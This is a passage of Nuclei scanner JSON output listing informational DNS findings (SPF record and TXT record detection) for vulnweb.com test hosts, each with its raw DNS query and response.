AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 33573\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.223783516Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testasp.vulnweb.com\",\"matched-at\":\"testasp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\",\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 33573\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 33573\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testasp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\\ntestasp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:33.224046061Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 27564\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 27564\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.244799977Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 27564\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 27564\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.245018657Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 56223\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 56223\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.245926804Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 56223\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 56223\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.246025682Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 8206\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 8206\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.251228134Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 8206\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 8206\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.251312225Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testaspnet.vulnweb.com\",\"matched-at\":\"testaspnet.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 20044\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testaspnet.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 20044\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testaspnet.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestaspnet.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:0I73u7E64LVLWuS-nT9ssWHaHOI36n65prWVTGJklFo\\\"\\ntestaspnet.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.252216275Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 34157\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 34157\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.252277979Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testaspnet.vulnweb.com\",\"matched-at\":\"testaspnet.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:0I73u7E64LVLWuS-nT9ssWHaHOI36n65prWVTGJklFo\\\"\",\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 20044\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testaspnet.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 20044\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testaspnet.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestaspnet.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:0I73u7E64LVLWuS-nT9ssWHaHOI36n65prWVTGJklFo\\\"\\ntestaspnet.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.252304264Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 34157\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 34157\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.252331462Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 55536\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 55536\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.254282107Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 55536\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 55536\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.254349716Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 8150\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 8150\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.254519945Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 8150\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 8150\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.254569169Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 59013\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 59013\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.25464727Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record 